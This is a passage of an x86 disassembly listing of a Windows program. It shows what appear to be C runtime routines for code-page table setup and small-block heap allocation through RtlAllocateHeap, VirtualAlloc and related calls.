and dword_40723C, 0
cmp eax, 0FFFFFFFEh
jnz short loc_403B50
mov dword_40723C, 1
jmp dword_405070
; ---------------------------------------------------------------------------
loc_403B50: ; CODE XREF: sub_403B30+E�j
cmp eax, 0FFFFFFFDh
jnz short loc_403B65
mov dword_40723C, 1
jmp dword_405074
; ---------------------------------------------------------------------------
loc_403B65: ; CODE XREF: sub_403B30+23�j
cmp eax, 0FFFFFFFCh
jnz short locret_403B79
mov eax, dword_407264
mov dword_40723C, 1
locret_403B79: ; CODE XREF: sub_403B30+38�j
retn
sub_403B30 endp
; =============== S U B R O U T I N E =======================================
sub_403B7A proc near ; CODE XREF: sub_403997+118�p
; sub_403997+152�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
sub eax, 3A4h
jz short loc_403BA7
sub eax, 4
jz short loc_403BA1
sub eax, 0Dh
jz short loc_403B9B
dec eax
jz short loc_403B95
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_403B95: ; CODE XREF: sub_403B7A+16�j
mov eax, 404h
retn
; ---------------------------------------------------------------------------
loc_403B9B: ; CODE XREF: sub_403B7A+13�j
mov eax, 412h
retn
; ---------------------------------------------------------------------------
loc_403BA1: ; CODE XREF: sub_403B7A+E�j
mov eax, 804h
retn
; ---------------------------------------------------------------------------
loc_403BA7: ; CODE XREF: sub_403B7A+9�j
mov eax, 411h
retn
sub_403B7A endp
; =============== S U B R O U T I N E =======================================
sub_403BAD proc near ; CODE XREF: sub_403997:loc_403B1A�p
push edi
push 40h
pop ecx
xor eax, eax
mov edi, offset byte_4073C0
rep stosd
stosb
xor eax, eax
mov edi, offset dword_4072A0
mov dword_407290, eax
mov dword_4072AC, eax
mov dword_4074C4, eax
stosd
stosd
stosd
pop edi
retn
sub_403BAD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403BD6 proc near ; CODE XREF: sub_403997:loc_403B1F�p
var_514 = byte ptr -514h
var_314 = byte ptr -314h
var_214 = byte ptr -214h
var_114 = byte ptr -114h
var_14 = byte ptr -14h
var_E = byte ptr -0Eh
var_D = byte ptr -0Dh
push ebp
mov ebp, esp
sub esp, 514h
lea eax, [ebp+var_14]
push esi
push eax
push dword_407290
call dword_405078 ; GetCPInfo
cmp eax, 1
jnz loc_403D0F
xor eax, eax
mov esi, 100h
loc_403C00: ; CODE XREF: sub_403BD6+34�j
mov [ebp+eax+var_114], al
inc eax
cmp eax, esi
jb short loc_403C00
mov al, [ebp+var_E]
mov [ebp+var_114], 20h
test al, al
jz short loc_403C51
push ebx
push edi
lea edx, [ebp+var_D]
loc_403C1F: ; CODE XREF: sub_403BD6+77�j
movzx ecx, byte ptr [edx]
movzx eax, al
cmp eax, ecx
ja short loc_403C46
sub ecx, eax
lea edi, [ebp+eax+var_114]
inc ecx
mov eax, 20202020h
mov ebx, ecx
shr ecx, 2
rep stosd
mov ecx, ebx
and ecx, 3
rep stosb
loc_403C46: ; CODE XREF: sub_403BD6+51�j
inc edx
inc edx
mov al, [edx-1]
test al, al
jnz short loc_403C1F
pop edi
pop ebx
loc_403C51: ; CODE XREF: sub_403BD6+42�j
push 0
lea eax, [ebp+var_514]
push dword_4074C4
push dword_407290
push eax
lea eax, [ebp+var_114]
push esi
push eax
push 1
call sub_40380C
push 0
lea eax, [ebp+var_214]
push dword_407290
push esi
push eax
lea eax, [ebp+var_114]
push esi
push eax
push esi
push dword_4074C4
call sub_4047EE
push 0
lea eax, [ebp+var_314]
push dword_407290
push esi
push eax
lea eax, [ebp+var_114]
push esi
push eax
push 200h
push dword_4074C4
call sub_4047EE
add esp, 5Ch
xor eax, eax
lea ecx, [ebp+var_514]
loc_403CCC: ; CODE XREF: sub_403BD6+135�j
mov dx, [ecx]
test dl, 1
jz short loc_403CEA
or byte_4073C1[eax], 10h
mov dl, [ebp+eax+var_214]
loc_403CE2: ; CODE XREF: sub_403BD6+127�j
mov byte_4072C0[eax], dl
jmp short loc_403D06
; ---------------------------------------------------------------------------
loc_403CEA: ; CODE XREF: sub_403BD6+FC�j
test dl, 2
jz short loc_403CFF
or byte_4073C1[eax], 20h
mov dl, [ebp+eax+var_314]
jmp short loc_403CE2
; ---------------------------------------------------------------------------
loc_403CFF: ; CODE XREF: sub_403BD6+117�j
and byte_4072C0[eax], 0
loc_403D06: ; CODE XREF: sub_403BD6+112�j
inc eax
inc ecx
inc ecx
cmp eax, esi
jb short loc_403CCC
jmp short loc_403D58
; ---------------------------------------------------------------------------
loc_403D0F: ; CODE XREF: sub_403BD6+1D�j
xor eax, eax
mov esi, 100h
loc_403D16: ; CODE XREF: sub_403BD6+180�j
cmp eax, 41h
jb short loc_403D34
cmp eax, 5Ah
ja short loc_403D34
or byte_4073C1[eax], 10h
mov cl, al
add cl, 20h
loc_403D2C: ; CODE XREF: sub_403BD6+174�j
mov byte_4072C0[eax], cl
jmp short loc_403D53
; ---------------------------------------------------------------------------
loc_403D34: ; CODE XREF: sub_403BD6+143�j
; sub_403BD6+148�j
cmp eax, 61h
jb short loc_403D4C
cmp eax, 7Ah
ja short loc_403D4C
or byte_4073C1[eax], 20h
mov cl, al
sub cl, 20h
jmp short loc_403D2C
; ---------------------------------------------------------------------------
loc_403D4C: ; CODE XREF: sub_403BD6+161�j
; sub_403BD6+166�j
and byte_4072C0[eax], 0
loc_403D53: ; CODE XREF: sub_403BD6+15C�j
inc eax
cmp eax, esi
jb short loc_403D16
loc_403D58: ; CODE XREF: sub_403BD6+137�j
pop esi
leave
retn
sub_403BD6 endp
; =============== S U B R O U T I N E =======================================
sub_403D5B proc near ; CODE XREF: sub_402E37+9�p
; sub_402E8F+D�p ...
cmp dword_4075E8, 0
jnz short locret_403D76
push 0FFFFFFFDh
call sub_403997
pop ecx
mov dword_4075E8, 1
locret_403D76: ; CODE XREF: sub_403D5B+7�j
retn
sub_403D5B endp
; =============== S U B R O U T I N E =======================================
sub_403D77 proc near ; CODE XREF: sub_402E8F+9D�p
; sub_403195+BF�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz short loc_403DA4
push esi
call sub_403E58
pop ecx
test eax, eax
push esi
jz short loc_403D96
push eax
call sub_403E83
pop ecx
pop ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_403D96: ; CODE XREF: sub_403D77+13�j
push 0
push dword_4074C8
call dword_405090 ; RtlFreeHeap
loc_403DA4: ; CODE XREF: sub_403D77+7�j
pop esi
retn
sub_403D77 endp
; =============== S U B R O U T I N E =======================================
sub_403DA6 proc near ; CODE XREF: sub_402E8F+3A�p
; sub_402E8F+6F�p ...
arg_0 = dword ptr 4
push dword_407270
push [esp+4+arg_0]
call sub_403DB8
pop ecx
pop ecx
retn
sub_403DA6 endp
; =============== S U B R O U T I N E =======================================
sub_403DB8 proc near ; CODE XREF: sub_403DA6+A�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp [esp+arg_0], 0FFFFFFE0h
ja short loc_403DE1
loc_403DBF: ; CODE XREF: sub_403DB8+27�j
push [esp+arg_0]
call sub_403DE4
test eax, eax
pop ecx
jnz short locret_403DE3
cmp [esp+arg_4], eax
jz short locret_403DE3
push [esp+arg_0]
call sub_404A3D
test eax, eax
pop ecx
jnz short loc_403DBF
loc_403DE1: ; CODE XREF: sub_403DB8+5�j
xor eax, eax
locret_403DE3: ; CODE XREF: sub_403DB8+13�j
; sub_403DB8+19�j
retn
sub_403DB8 endp
; =============== S U B R O U T I N E =======================================
sub_403DE4 proc near ; CODE XREF: sub_403DB8+B�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
cmp esi, dword_4070B8
ja short loc_403DFC
push esi
call sub_4041AE
test eax, eax
pop ecx
jnz short loc_403E18
loc_403DFC: ; CODE XREF: sub_403DE4+B�j
test esi, esi
jnz short loc_403E03
push 1
pop esi
loc_403E03: ; CODE XREF: sub_403DE4+1A�j
add esi, 0Fh
and esi, 0FFFFFFF0h
push esi
push 0
push dword_4074C8
call dword_40506C ; RtlAllocateHeap
loc_403E18: ; CODE XREF: sub_403DE4+16�j
pop esi
retn
sub_403DE4 endp
; =============== S U B R O U T I N E =======================================
sub_403E1A proc near ; CODE XREF: sub_403472+20�p
push 140h
push 0
push dword_4074C8
call dword_40506C ; RtlAllocateHeap
test eax, eax
mov dword_40728C, eax
jnz short loc_403E37
retn
; ---------------------------------------------------------------------------
loc_403E37: ; CODE XREF: sub_403E1A+1A�j
and dword_407284, 0
and dword_407288, 0
push 1
mov dword_407280, eax
mov dword_407278, 10h
pop eax
retn
sub_403E1A endp
; =============== S U B R O U T I N E =======================================
sub_403E58 proc near ; CODE XREF: sub_403D77+A�p
arg_0 = dword ptr 4
mov eax, dword_407288
lea ecx, [eax+eax*4]
mov eax, dword_40728C
lea ecx, [eax+ecx*4]
loc_403E68: ; CODE XREF: sub_403E58+26�j
cmp eax, ecx
jnb short loc_403E80
mov edx, [esp+arg_0]
sub edx, [eax+0Ch]
cmp edx, 100000h
jb short locret_403E82
add eax, 14h
jmp short loc_403E68
; ---------------------------------------------------------------------------
loc_403E80: ; CODE XREF: sub_403E58+12�j
xor eax, eax
locret_403E82: ; CODE XREF: sub_403E58+21�j
retn
sub_403E58 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403E83 proc near ; CODE XREF: sub_403D77+16�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 14h
mov edx, [ebp+arg_4]
mov ecx, [ebp+arg_0]
push ebx
push esi
mov eax, [ecx+10h]
mov esi, edx
sub esi, [ecx+0Ch]
mov ebx, [edx-4]
add edx, 0FFFFFFFCh
push edi
shr esi, 0Fh
mov ecx, esi
mov edi, [edx-4]
imul ecx, 204h
dec ebx
mov [ebp+var_4], edi
lea ecx, [ecx+eax+144h]
mov [ebp+var_C], ebx
mov [ebp+var_10], ecx
mov ecx, [ebx+edx]
test cl, 1
mov [ebp+var_8], ecx
jnz short loc_403F49
sar ecx, 4
push 3Fh
dec ecx
pop edi
mov [ebp+arg_4], ecx
cmp ecx, edi
jbe short loc_403EDB
mov [ebp+arg_4], edi
loc_403EDB: ; CODE XREF: sub_403E83+53�j
mov ecx, [ebx+edx+4]
cmp ecx, [ebx+edx+8]
jnz short loc_403F2D
mov ecx, [ebp+arg_4]
cmp ecx, 20h
jnb short loc_403F09
mov edi, 80000000h
shr edi, cl
lea ecx, [ecx+eax+4]
not edi
and [eax+esi*4+44h], edi
dec byte ptr [ecx]
jnz short loc_403F2D
mov ecx, [ebp+arg_0]
and [ecx], edi
jmp short loc_403F2D
; ---------------------------------------------------------------------------
loc_403F09: ; CODE XREF: sub_403E83+68�j
add ecx, 0FFFFFFE0h
mov edi, 80000000h
shr edi, cl
mov ecx, [ebp+arg_4]
lea ecx, [ecx+eax+4]
not edi
and [eax+esi*4+0C4h], edi
dec byte ptr [ecx]
jnz short loc_403F2D
mov ecx, [ebp+arg_0]
and [ecx+4], edi
loc_403F2D: ; CODE XREF: sub_403E83+60�j
; sub_403E83+7D�j ...
mov ecx, [ebx+edx+8]
mov edi, [ebx+edx+4]
mov [ecx+4], edi
mov ecx, [ebx+edx+4]
mov edi, [ebx+edx+8]
add ebx, [ebp+var_8]
mov [ecx+8], edi
mov [ebp+var_C], ebx
loc_403F49: ; CODE XREF: sub_403E83+45�j
mov edi, ebx
sar edi, 4
dec edi
cmp edi, 3Fh
jbe short loc_403F57
push 3Fh
pop edi
loc_403F57: ; CODE XREF: sub_403E83+CF�j
mov ecx, [ebp+var_4]
and ecx, 1
mov [ebp+var_14], ecx
jnz loc_404006
sub edx, [ebp+var_4]
mov ecx, [ebp+var_4]
sar ecx, 4
push 3Fh
mov [ebp+var_8], edx
dec ecx
pop edx
cmp ecx, edx
mov [ebp+arg_4], ecx
jbe short loc_403F82
mov [ebp+arg_4], edx
mov ecx, edx
loc_403F82: ; CODE XREF: sub_403E83+F8�j
add ebx, [ebp+var_4]
mov edi, ebx
mov [ebp+var_C], ebx
sar edi, 4
dec edi
cmp edi, edx
jbe short loc_403F94
mov edi, edx
loc_403F94: ; CODE XREF: sub_403E83+10D�j
cmp ecx, edi
jz short loc_404003
mov ecx, [ebp+var_8]
mov edx, [ecx+4]
cmp edx, [ecx+8]
jnz short loc_403FEB
mov ecx, [ebp+arg_4]
cmp ecx, 20h
jnb short loc_403FC7
mov edx, 80000000h
shr edx, cl
lea ecx, [ecx+eax+4]
not edx
and [eax+esi*4+44h], edx
dec byte ptr [ecx]
jnz short loc_403FEB
mov ecx, [ebp+arg_0]
and [ecx], edx
jmp short loc_403FEB
; ---------------------------------------------------------------------------
loc_403FC7: ; CODE XREF: sub_403E83+126�j
add ecx, 0FFFFFFE0h
mov edx, 80000000h
shr edx, cl
mov ecx, [ebp+arg_4]
lea ecx, [ecx+eax+4]
not edx
and [eax+esi*4+0C4h], edx
dec byte ptr [ecx]
jnz short loc_403FEB
mov ecx, [ebp+arg_0]
and [ecx+4], edx
loc_403FEB: ; CODE XREF: sub_403E83+11E�j
; sub_403E83+13B�j ...
mov ecx, [ebp+var_8]
mov edx, [ecx+8]
mov ecx, [ecx+4]
mov [edx+4], ecx
mov ecx, [ebp+var_8]
mov edx, [ecx+4]
mov ecx, [ecx+8]
mov [edx+8], ecx
loc_404003: ; CODE XREF: sub_403E83+113�j
mov edx, [ebp+var_8]
loc_404006: ; CODE XREF: sub_403E83+DD�j
cmp [ebp+var_14], 0
jnz short loc_404015
cmp [ebp+arg_4], edi
jz loc_40409E
loc_404015: ; CODE XREF: sub_403E83+187�j
mov ecx, [ebp+var_10]
lea ecx, [ecx+edi*8]
mov ecx, [ecx+4]
mov [edx+4], ecx
mov ecx, [ebp+var_10]
lea ecx, [ecx+edi*8]
mov [edx+8], ecx
mov [ecx+4], edx
mov ecx, [edx+4]
mov [ecx+8], edx
mov ecx, [edx+4]
cmp ecx, [edx+8]
jnz short loc_40409E
mov cl, [edi+eax+4]
cmp edi, 20h
mov byte ptr [ebp+arg_4+3], cl
inc cl
mov [edi+eax+4], cl
jnb short loc_404072
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_404061
mov ebx, 80000000h
mov ecx, edi
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx], ebx
loc_404061: ; CODE XREF: sub_403E83+1CE�j
mov ebx, 80000000h
mov ecx, edi
shr ebx, cl
lea eax, [eax+esi*4+44h]
or [eax], ebx
jmp short loc_40409B
; ---------------------------------------------------------------------------
loc_404072: ; CODE XREF: sub_403E83+1C8�j
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_404088
lea ecx, [edi-20h]
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx+4], ebx
loc_404088: ; CODE XREF: sub_403E83+1F3�j
lea ecx, [edi-20h]
mov edi, 80000000h
shr edi, cl
lea eax, [eax+esi*4+0C4h]
or [eax], edi
loc_40409B: ; CODE XREF: sub_403E83+1ED�j
mov ebx, [ebp+var_C]
loc_40409E: ; CODE XREF: sub_403E83+18C�j
; sub_403E83+1B6�j
mov eax, [ebp+var_10]
mov [edx], ebx
mov [ebx+edx-4], ebx
dec dword ptr [eax]
jnz loc_4041A9
mov eax, dword_407284
test eax, eax
jz loc_40419B
mov ecx, dword_40727C
mov edi, dword_405094
shl ecx, 0Fh
add ecx, [eax+0Ch]
mov ebx, 8000h
push 4000h
push ebx
push ecx
call edi ; dword_405094
mov ecx, dword_40727C
mov eax, dword_407284
mov edx, 80000000h
shr edx, cl
or [eax+8], edx
mov eax, dword_407284
mov ecx, dword_40727C
mov eax, [eax+10h]
and dword ptr [eax+ecx*4+0C4h], 0
mov eax, dword_407284
mov eax, [eax+10h]
dec byte ptr [eax+43h]
mov eax, dword_407284
mov ecx, [eax+10h]
cmp byte ptr [ecx+43h], 0
jnz short loc_404129
and dword ptr [eax+4], 0FFFFFFFEh
mov eax, dword_407284
loc_404129: ; CODE XREF: sub_403E83+29B�j
cmp dword ptr [eax+8], 0FFFFFFFFh
jnz short loc_40419B
push ebx
push 0
push dword ptr [eax+0Ch]
call edi ; dword_405094
mov eax, dword_407284
push dword ptr [eax+10h]
push 0
push dword_4074C8
call dword_405090 ; RtlFreeHeap
mov eax, dword_407288
mov edx, dword_40728C
lea eax, [eax+eax*4]
shl eax, 2
mov ecx, eax
mov eax, dword_407284
sub ecx, eax
lea ecx, [ecx+edx-14h]
push ecx
lea ecx, [eax+14h]
push ecx
push eax
call sub_404A60
mov eax, [ebp+arg_0]
add esp, 0Ch
dec dword_407288
cmp eax, dword_407284
jbe short loc_40418D
sub eax, 14h
loc_40418D: ; CODE XREF: sub_403E83+305�j
mov ecx, dword_40728C
mov dword_407280, ecx
jmp short loc_40419E
; ---------------------------------------------------------------------------
loc_40419B: ; CODE XREF: sub_403E83+233�j
; sub_403E83+2AA�j
mov eax, [ebp+arg_0]
loc_40419E: ; CODE XREF: sub_403E83+316�j
mov dword_407284, eax
mov dword_40727C, esi
loc_4041A9: ; CODE XREF: sub_403E83+226�j
pop edi
pop esi
pop ebx
leave
retn
sub_403E83 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4041AE proc near ; CODE XREF: sub_403DE4+E�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
mov eax, dword_407288
mov edx, dword_40728C
push ebx
push esi
lea eax, [eax+eax*4]
push edi
lea edi, [edx+eax*4]
mov eax, [ebp+arg_0]
mov [ebp+var_4], edi
lea ecx, [eax+17h]
and ecx, 0FFFFFFF0h
mov [ebp+var_10], ecx
sar ecx, 4
dec ecx
cmp ecx, 20h
jge short loc_4041EE
or esi, 0FFFFFFFFh
shr esi, cl
or [ebp+var_8], 0FFFFFFFFh
mov [ebp+var_C], esi
jmp short loc_4041FE
; ---------------------------------------------------------------------------
loc_4041EE: ; CODE XREF: sub_4041AE+30�j
add ecx, 0FFFFFFE0h
or eax, 0FFFFFFFFh
xor esi, esi
shr eax, cl
mov [ebp+var_C], esi
mov [ebp+var_8], eax
loc_4041FE: ; CODE XREF: sub_4041AE+3E�j
mov eax, dword_407280
mov ebx, eax
cmp ebx, edi
mov [ebp+arg_0], ebx
jnb short loc_404225
loc_40420C: ; CODE XREF: sub_4041AE+75�j
mov ecx, [ebx+4]
mov edi, [ebx]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_404225
add ebx, 14h
cmp ebx, [ebp+var_4]
mov [ebp+arg_0], ebx
jb short loc_40420C
loc_404225: ; CODE XREF: sub_4041AE+5C�j
; sub_4041AE+6A�j
cmp ebx, [ebp+var_4]
jnz short loc_4042A3
mov ebx, edx
loc_40422C: ; CODE XREF: sub_4041AE+96�j
cmp ebx, eax
mov [ebp+arg_0], ebx
jnb short loc_404248
mov ecx, [ebx+4]
mov edi, [ebx]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_404246
add ebx, 14h
jmp short loc_40422C
; ---------------------------------------------------------------------------
loc_404246: ; CODE XREF: sub_4041AE+91�j
cmp ebx, eax
loc_404248: ; CODE XREF: sub_4041AE+83�j
jnz short loc_4042A3
loc_40424A: ; CODE XREF: sub_4041AE+AD�j
cmp ebx, [ebp+var_4]
jnb short loc_404260
cmp dword ptr [ebx+8], 0
jnz short loc_40425D
add ebx, 14h
mov [ebp+arg_0], ebx
jmp short loc_40424A
; ---------------------------------------------------------------------------
loc_40425D: ; CODE XREF: sub_4041AE+A5�j
cmp ebx, [ebp+var_4]
loc_404260: ; CODE XREF: sub_4041AE+9F�j
jnz short loc_404288
mov ebx, edx
loc_404264: ; CODE XREF: sub_4041AE+C6�j
cmp ebx, eax
mov [ebp+arg_0], ebx
jnb short loc_404278
cmp dword ptr [ebx+8], 0
jnz short loc_404276
add ebx, 14h
jmp short loc_404264
; ---------------------------------------------------------------------------
loc_404276: ; CODE XREF: sub_4041AE+C1�j
cmp ebx, eax
loc_404278: ; CODE XREF: sub_4041AE+BB�j
jnz short loc_404288
call sub_4044B7
mov ebx, eax
test ebx, ebx
mov [ebp+arg_0], ebx
jz short loc_40429C
loc_404288: ; CODE XREF: sub_4041AE:loc_404260�j
; sub_4041AE:loc_404278�j
push ebx
call sub_404568
pop ecx
mov ecx, [ebx+10h]
mov [ecx], eax
mov eax, [ebx+10h]
cmp dword ptr [eax], 0FFFFFFFFh
jnz short loc_4042A3
loc_40429C: ; CODE XREF: sub_4041AE+D8�j
xor eax, eax
jmp loc_4044B2
; ---------------------------------------------------------------------------
loc_4042A3: ; CODE XREF: sub_4041AE+7A�j
; sub_4041AE:loc_404248�j ...
mov dword_407280, ebx
mov eax, [ebx+10h]
mov edx, [eax]
cmp edx, 0FFFFFFFFh
mov [ebp+var_4], edx
jz short loc_4042CA
mov ecx, [eax+edx*4+0C4h]
mov edi, [eax+edx*4+44h]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_404301
loc_4042CA: ; CODE XREF: sub_4041AE+106�j
mov edx, [eax+0C4h]
mov esi, [eax+44h]
and edx, [ebp+var_8]
and esi, [ebp+var_C]
and [ebp+var_4], 0
lea ecx, [eax+44h]
or edx, esi
mov esi, [ebp+var_C]
jnz short loc_4042FE
loc_4042E7: ; CODE XREF: sub_4041AE+14E�j
mov edx, [ecx+84h]
inc [ebp+var_4]
and edx, [ebp+var_8]
add ecx, 4
mov edi, esi
and edi, [ecx]
or edx, edi
jz short loc_4042E7
loc_4042FE: ; CODE XREF: sub_4041AE+137�j
mov edx, [ebp+var_4]
loc_404301: ; CODE XREF: sub_4041AE+11A�j
mov ecx, edx
xor edi, edi
imul ecx, 204h
lea ecx, [ecx+eax+144h]
mov [ebp+var_C], ecx
mov ecx, [eax+edx*4+44h]
and ecx, esi
jnz short loc_40432A
mov ecx, [eax+edx*4+0C4h]
push 20h
and ecx, [ebp+var_8]
pop edi
loc_40432A: ; CODE XREF: sub_4041AE+16D�j
; sub_4041AE+183�j
test ecx, ecx
jl short loc_404333
shl ecx, 1
inc edi
jmp short loc_40432A
; ---------------------------------------------------------------------------
loc_404333: ; CODE XREF: sub_4041AE+17E�j
mov ecx, [ebp+var_C]
mov edx, [ecx+edi*8+4]
mov ecx, [edx]
sub ecx, [ebp+var_10]
mov esi, ecx
mov [ebp+var_8], ecx
sar esi, 4
dec esi
cmp esi, 3Fh
jle short loc_404350
push 3Fh
pop esi
loc_404350: ; CODE XREF: sub_4041AE+19D�j
cmp esi, edi
jz loc_404465
mov ecx, [edx+4]
cmp ecx, [edx+8]
jnz short loc_4043C1
cmp edi, 20h
jge short loc_404390
mov ebx, 80000000h
mov ecx, edi
shr ebx, cl
mov ecx, [ebp+var_4]
lea edi, [eax+edi+4]
not ebx
mov [ebp+var_14], ebx
and ebx, [eax+ecx*4+44h]
mov [eax+ecx*4+44h], ebx
dec byte ptr [edi]
jnz short loc_4043BE
mov ebx, [ebp+arg_0]
mov ecx, [ebp+var_14]
and [ebx], ecx
jmp short loc_4043C1
; ---------------------------------------------------------------------------
loc_404390: ; CODE XREF: sub_4041AE+1B5�j
lea ecx, [edi-20h]
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+var_4]
lea edi, [eax+edi+4]
lea ecx, [eax+ecx*4+0C4h]
not ebx
and [ecx], ebx
dec byte ptr [edi]
mov [ebp+var_14], ebx
jnz short loc_4043BE
mov ebx, [ebp+arg_0]
mov ecx, [ebp+var_14]
and [ebx+4], ecx
jmp short loc_4043C1
; ---------------------------------------------------------------------------
loc_4043BE: ; CODE XREF: sub_4041AE+1D6�j
; sub_4041AE+203�j
mov ebx, [ebp+arg_0]
loc_4043C1: ; CODE XREF: sub_4041AE+1B0�j
; sub_4041AE+1E0�j ...
mov ecx, [edx+8]
mov edi, [edx+4]
cmp [ebp+var_8], 0
mov [ecx+4], edi
mov ecx, [edx+4]
mov edi, [edx+8]
mov [ecx+8], edi
jz loc_404471
mov ecx, [ebp+var_C]
mov edi, [ecx+esi*8+4]
lea ecx, [ecx+esi*8]
mov [edx+4], edi
mov [edx+8], ecx
mov [ecx+4], edx
mov ecx, [edx+4]
mov [ecx+8], edx
mov ecx, [edx+4]
cmp ecx, [edx+8]
jnz short loc_404462
mov cl, [esi+eax+4]
cmp esi, 20h
mov byte ptr [ebp+arg_0+3], cl
jge short loc_404433
inc cl
cmp byte ptr [ebp+arg_0+3], 0
mov [esi+eax+4], cl
jnz short loc_404421
mov edi, 80000000h
mov ecx, esi
shr edi, cl
or [ebx], edi
loc_404421: ; CODE XREF: sub_4041AE+266�j
mov edi, 80000000h
mov ecx, esi
shr edi, cl
mov ecx, [ebp+var_4]
or [eax+ecx*4+44h], edi
jmp short loc_404462
; ---------------------------------------------------------------------------
loc_404433: ; CODE XREF: sub_4041AE+25A�j
inc cl
cmp byte ptr [ebp+arg_0+3], 0
mov [esi+eax+4], cl
jnz short loc_40444C
lea ecx, [esi-20h]
mov edi, 80000000h
shr edi, cl
or [ebx+4], edi
loc_40444C: ; CODE XREF: sub_4041AE+28F�j
mov ecx, [ebp+var_4]
lea edi, [eax+ecx*4+0C4h]
lea ecx, [esi-20h]
mov esi, 80000000h
shr esi, cl
or [edi], esi
loc_404462: ; CODE XREF: sub_4041AE+24E�j
; sub_4041AE+283�j
mov ecx, [ebp+var_8]
loc_404465: ; CODE XREF: sub_4041AE+1A4�j
test ecx, ecx
jz short loc_404474
mov [edx], ecx
mov [ecx+edx-4], ecx
jmp short loc_404474
; ---------------------------------------------------------------------------
loc_404471: ; CODE XREF: sub_4041AE+229�j
mov ecx, [ebp+var_8]
loc_404474: ; CODE XREF: sub_4041AE+2B9�j
; sub_4041AE+2C1�j
mov esi, [ebp+var_10]
add edx, ecx
lea ecx, [esi+1]
mov [edx], ecx
mov [edx+esi-4], ecx
mov esi, [ebp+var_C]
mov ecx, [esi]
test ecx, ecx
lea edi, [ecx+1]
mov [esi], edi
jnz short loc_4044AA
cmp ebx, dword_407284
jnz short loc_4044AA
mov ecx, [ebp+var_4]
cmp ecx, dword_40727C
jnz short loc_4044AA
and dword_407284, 0
loc_4044AA: ; CODE XREF: sub_4041AE+2E0�j
; sub_4041AE+2E8�j ...
mov ecx, [ebp+var_4]
mov [eax], ecx
lea eax, [edx+4]
loc_4044B2: ; CODE XREF: sub_4041AE+F0�j
pop edi
pop esi
pop ebx
leave
retn
sub_4041AE endp
; =============== S U B R O U T I N E =======================================
sub_4044B7 proc near ; CODE XREF: sub_4041AE+CC�p
mov eax, dword_407288
mov ecx, dword_407278
push esi
push edi
xor edi, edi
cmp eax, ecx
jnz short loc_4044FA
lea eax, [ecx+ecx*4+50h]
shl eax, 2
push eax
push dword_40728C
push edi
push dword_4074C8
call dword_405064 ; RtlReAllocateHeap
cmp eax, edi
jz short loc_40454A
add dword_407278, 10h
mov dword_40728C, eax
mov eax, dword_407288
loc_4044FA: ; CODE XREF: sub_4044B7+11�j
mov ecx, dword_40728C
push 41C4h
push 8
lea eax, [eax+eax*4]
push dword_4074C8
lea esi, [ecx+eax*4]
call dword_40506C ; RtlAllocateHeap
cmp eax, edi
mov [esi+10h], eax
jz short loc_40454A
push 4
push 2000h
push 100000h
push edi
call dword_405068 ; VirtualAlloc
cmp eax, edi
mov [esi+0Ch], eax
jnz short loc_40454E
push dword ptr [esi+10h]
push edi
push dword_4074C8
call dword_405090 ; RtlFreeHeap
loc_40454A: ; CODE XREF: sub_4044B7+30�j
; sub_4044B7+67�j
xor eax, eax
jmp short loc_404565
; ---------------------------------------------------------------------------
loc_40454E: ; CODE XREF: sub_4044B7+81�j
or dword ptr [esi+8], 0FFFFFFFFh
mov [esi], edi
mov [esi+4], edi
inc dword_407288
mov eax, [esi+10h]
or dword ptr [eax], 0FFFFFFFFh
mov eax, esi
loc_404565: ; CODE XREF: sub_4044B7+95�j
pop edi
pop esi
retn
sub_4044B7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404568 proc near ; CODE XREF: sub_4041AE+DB�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov ecx, [ebp+arg_0]
push ebx
push esi
push edi
mov esi, [ecx+10h]
mov eax, [ecx+8]
xor ebx, ebx
loc_40457A: ; CODE XREF: sub_404568+19�j
test eax, eax
jl short loc_404583
shl eax, 1
inc ebx
jmp short loc_40457A
; ---------------------------------------------------------------------------
loc_404583: ; CODE XREF: sub_404568+14�j
mov eax, ebx
push 3Fh
imul eax, 204h
pop edx
lea eax, [eax+esi+144h]
mov [ebp+var_4], eax
loc_404598: ; CODE XREF: sub_404568+3A�j
mov [eax+8], eax
mov [eax+4], eax
add eax, 8
dec edx
jnz short loc_404598
mov edi, ebx
push 4
shl edi, 0Fh
add edi, [ecx+0Ch]
push 1000h
push 8000h
push edi
call dword_405068 ; VirtualAlloc
test eax, eax
jnz short loc_4045CB
or eax, 0FFFFFFFFh
jmp loc_40465E
; ---------------------------------------------------------------------------
loc_4045CB: ; CODE XREF: sub_404568+59�j
lea edx, [edi+7000h]
cmp edi, edx
ja short loc_404611
lea eax, [edi+10h]
loc_4045D8: ; CODE XREF: sub_404568+A7�j
or dword ptr [eax-8], 0FFFFFFFFh
or dword ptr [eax+0FECh], 0FFFFFFFFh
lea ecx, [eax+0FFCh]
mov dword ptr [eax-4], 0FF0h
mov [eax], ecx
lea ecx, [eax-1004h]
mov [eax+4], ecx
mov dword ptr [eax+0FE8h], 0FF0h
add eax, 1000h
lea ecx, [eax-10h]
